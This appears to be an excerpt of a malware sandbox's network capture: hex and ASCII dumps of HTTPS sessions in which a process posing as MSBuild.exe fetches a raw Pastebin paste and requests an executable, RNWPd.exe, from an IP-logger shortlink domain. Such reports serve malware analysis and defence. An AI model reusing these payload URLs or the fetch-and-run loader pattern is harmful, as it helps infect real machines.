2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63 Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 45 65 66 6d 68 37 38 31 78 68 4c 73 64 49 57 6b 72 70 71 6c 79 41 59 52 69 6b 73 52 71 61 36 2e 57 70 53 4d 7a 31 4d 63 47 77 5f 71 32 6b 32 47 36 4d 37 64 4a 55 41 4b 41 39 30 55 6b 64 39 38 4c 45 42 72 48 6e 50 79 67 6b 4a 46 37 56 47 69 56 64 6e 52 4c 7a 67 56 6d 4e 63 6c 4a 6f 62 45 59 41 79 72 63 42 2e 4e 45 4e 61 5a 78 6c 69 7a 41 35 70 66 6b 77 4e 64 39 68 68 74 34 51 51 36 47 71 7a 64 38 46 2e 6f 4d 7a 64 46 41 53 36 4c 39 41 2e 42 69 37 56 42 5a 4c 79 52 35 70 33 41 43 49 37 48 6d 6e 6d 65 74 76 67 48 56 4c 4d 61 77 50 4c 42 50 64 7a 78 31 32 71 68 32 33 34 6c 58 55 48 4e 4e 74 66 41 6e 75 66 7a 76 4e 57 72 32 37 63 55 4e 33 35 76 32 6d 72 73 63 73 52 4c 4b 6d 49 4c 72 32 5a 6b 77 74 45 2e 66 50 51 32 49 61 42 76 6d 63 65 75 78 4a 33 71 71 76 4c Data Ascii: Eefmh781xhLsdIWkrpqlyAYRiksRqa6.WpSMz1McGw_q2k2G6M7dJUAKA90Ukd98LEBrHnPygkJF7VGiVdnRLzgVmNclJobEYAyrcB.NENaZxlizA5pfkwNd9hht4QQ6Gqzd8F.oMzdFAS6L9A.Bi7VBZLyR5p3ACI7HmnmetvgHVLMawPLBPdzx12qh234lXUHNNtfAnufzvNWr27cUN35v2mrscsRLKmILr2ZkwtE.fPQ2IaBvmceuxJ3qqvL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49759	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:09 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:09 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c43393fb883428f-EWR
2024-09-16 19:22:09 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:09 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:09 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:09 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49760	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:10 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:11 UTC	912	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:11 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPSfT0cTVmHZS%2Bm%2FaL4vgGZ%2BtbvRf6R%2F9xWwX%2BcHUGhLgIsLMccj7Pa%2BJy4mFT7lN87IHpwJ9xR%2F%2BVhms95yoojknITcaKeNeYK2SOZSROt6Vg%2FMUl3oU7A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433948fe648cc6-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:11 UTC	457	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:11 UTC	1369	IN	Data Raw: 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c Data Ascii: ="revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><
2024-09-16 19:22:11 UTC	1369	IN	Data Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d Data Ascii: ;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-anim
2024-09-16 19:22:11 UTC	1369	IN	Data Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 Data Ascii: avigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.i
2024-09-16 19:22:11 UTC	1369	IN	Data Raw: 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a Data Ascii: </script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:
2024-09-16 19:22:11 UTC	1369	IN	Data Raw: 3b 68 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 Data Ascii: ;height:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain">
2024-09-16 19:22:11 UTC	168	IN	Data Raw: 64 6f 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: dom()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49761	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:15 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
